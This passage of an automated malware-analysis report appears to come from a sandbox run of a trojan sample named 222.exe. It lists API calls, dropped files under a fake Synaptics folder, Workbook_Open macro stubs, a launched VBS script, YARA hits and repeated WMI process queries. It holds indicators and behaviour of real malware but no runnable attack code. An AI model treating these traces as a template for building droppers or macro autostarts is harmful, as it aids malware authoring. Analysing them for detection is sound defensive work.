                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_004AEFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,9_2_004AEFA8
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_0045AFB4 GetParent,NtdllDialogWndProc_W,9_2_0045AFB4
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_004AF0A1 SendMessageW,NtdllDialogWndProc_W,9_2_004AF0A1
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_004AF122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,9_2_004AF122
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_004AF37C NtdllDialogWndProc_W,9_2_004AF37C
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_004AF3DA NtdllDialogWndProc_W,9_2_004AF3DA
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_004AF3AB NtdllDialogWndProc_W,9_2_004AF3AB
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_004AF45A ClientToScreen,NtdllDialogWndProc_W,9_2_004AF45A
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_004AF425 NtdllDialogWndProc_W,9_2_004AF425
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_004AF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,9_2_004AF5D0
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_004AF594 GetWindowLongW,NtdllDialogWndProc_W,9_2_004AF594
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_0045B7F2 NtdllDialogWndProc_W,9_2_0045B7F2
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_0045B845 NtdllDialogWndProc_W,9_2_0045B845
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_004AFE80 NtdllDialogWndProc_W,9_2_004AFE80
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_004AFF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,9_2_004AFF04
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_004AFF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,9_2_004AFF91
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007A702F: CreateFileW,DeviceIoControl,CloseHandle,2_2_007A702F
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_0079B9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74745590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,2_2_0079B9F1
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007A82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_007A82D0
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_004882D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,9_2_004882D0
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007C30AD2_2_007C30AD
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007736802_2_00773680
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_0076DCD02_2_0076DCD0
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_0076A0C02_2_0076A0C0
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007801832_2_00780183
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007A220C2_2_007A220C
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007685302_2_00768530
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007666702_2_00766670
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007806772_2_00780677
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007CA8DC2_2_007CA8DC
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_00780A8F2_2_00780A8F
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_00766BBC2_2_00766BBC
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_0078AC832_2_0078AC83
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_0077AD5C2_2_0077AD5C
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_00780EC42_2_00780EC4
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_00794EBF2_2_00794EBF
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_0079113E2_2_0079113E
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007812F92_2_007812F9
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_0079542F2_2_0079542F
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007CF5D02_2_007CF5D0
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_0079599F2_2_0079599F
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_00765D322_2_00765D32
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_0076BDF02_2_0076BDF0
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_0078BDF62_2_0078BDF6
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_00781E5A2_2_00781E5A
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_0078DF692_2_0078DF69
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_00797FFD2_2_00797FFD
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007ABFB82_2_007ABFB8
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_0044DCD09_2_0044DCD0
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_0044A0C09_2_0044A0C0
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_004601839_2_00460183
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_0048220C9_2_0048220C
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_004485309_2_00448530
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_004606779_2_00460677
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_004466709_2_00446670
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_004AA8DC9_2_004AA8DC
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_00460A8F9_2_00460A8F
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_00446BBC9_2_00446BBC
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_0046AC839_2_0046AC83
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_0045AD5C9_2_0045AD5C
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_00460EC49_2_00460EC4
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_00474EBF9_2_00474EBF
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_004A30AD9_2_004A30AD
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_0047113E9_2_0047113E
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_004612F99_2_004612F9
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_0047542F9_2_0047542F
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_004AF5D09_2_004AF5D0
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_004536809_2_00453680
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_0047599F9_2_0047599F
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_00445D329_2_00445D32
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_0046BDF69_2_0046BDF6
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_0044BDF09_2_0044BDF0
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_00461E5A9_2_00461E5A
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_0046DF699_2_0046DF69
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_00477FFD9_2_00477FFD
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_0048BFB89_2_0048BFB8
                              Source: XJVR1Oh1.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_Open()
                              Source: XJVR1Oh1.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                              Source: NVWZAPQSQL.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_Open()
                              Source: NVWZAPQSQL.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: String function: 0077F885 appears 68 times
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: String function: 00787750 appears 42 times
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: String function: 0045F885 appears 68 times
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: String function: 00467750 appears 42 times
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6192 -s 10496
                              Source: 222.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                              Source: 222.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                              Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: RCX6FEC.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: ~$cache1.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: 222.exe, 00000000.00000000.2014261512.00000000004A5000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameb! vs 222.exe
                              Source: 222.exe, 00000000.00000003.2022654571.000000000071D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs 222.exe
                              Source: 222.exe, 00000000.00000003.2022654571.000000000071D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName>( vs 222.exe
                              Source: 222.exe, 00000000.00000000.2014175538.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs 222.exe
                              Source: 222.exe, 00000000.00000003.2022602971.00000000024F0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs 222.exe
                              Source: 222.exeBinary or memory string: OriginalFileName vs 222.exe
                              Source: 222.exeBinary or memory string: OriginalFilenameb! vs 222.exe
                              Source: 222.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                              Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@20/59@10/4
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007AD712 GetLastError,FormatMessageW,2_2_007AD712
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_0079B8B0 AdjustTokenPrivileges,CloseHandle,2_2_0079B8B0
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_0079BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_0079BEC3
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_0047B8B0 AdjustTokenPrivileges,CloseHandle,9_2_0047B8B0
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_0047BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,9_2_0047BEC3
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007AEA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,2_2_007AEA85
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007A6F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,2_2_007A6F5B
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007AEFCD CoInitialize,CoCreateInstance,CoUninitialize,2_2_007AEFCD
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007631F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,2_2_007631F2
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
                              Source: C:\Users\user\Desktop\222.exeFile created: C:\Users\user\Desktop\._cache_222.exeJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6192
                              Source: C:\ProgramData\Synaptics\Synaptics.exeMutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6148:120:WilError_03
                              Source: C:\Users\user\Desktop\._cache_222.exeFile created: C:\Users\user\AppData\Local\Temp\HBMQLS.vbsJump to behavior
                              Source: Yara matchFile source: 222.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.222.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.2014175538.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX6FEC.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\Documents\EEGWXUHVUG\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Source: C:\Users\user\Desktop\._cache_222.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\HBMQLS.vbs
                              Source: C:\Users\user\Desktop\222.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
